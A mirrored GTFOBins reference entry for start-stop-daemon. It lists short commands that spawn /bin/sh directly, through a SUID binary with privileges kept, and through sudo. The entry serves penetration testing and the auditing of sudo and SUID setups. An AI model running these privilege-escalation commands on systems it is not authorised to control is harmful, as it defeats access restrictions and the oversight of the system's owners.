1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-08 15:59:17 +01:00
GTFOBins.github.io/_gtfobins/start-stop-daemon.md

12 lines
242 B
Markdown
Raw Normal View History

2018-11-05 16:34:57 +01:00
---
functions:
shell:
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
suid:
- code: |
./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
sudo:
- code: |
sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
---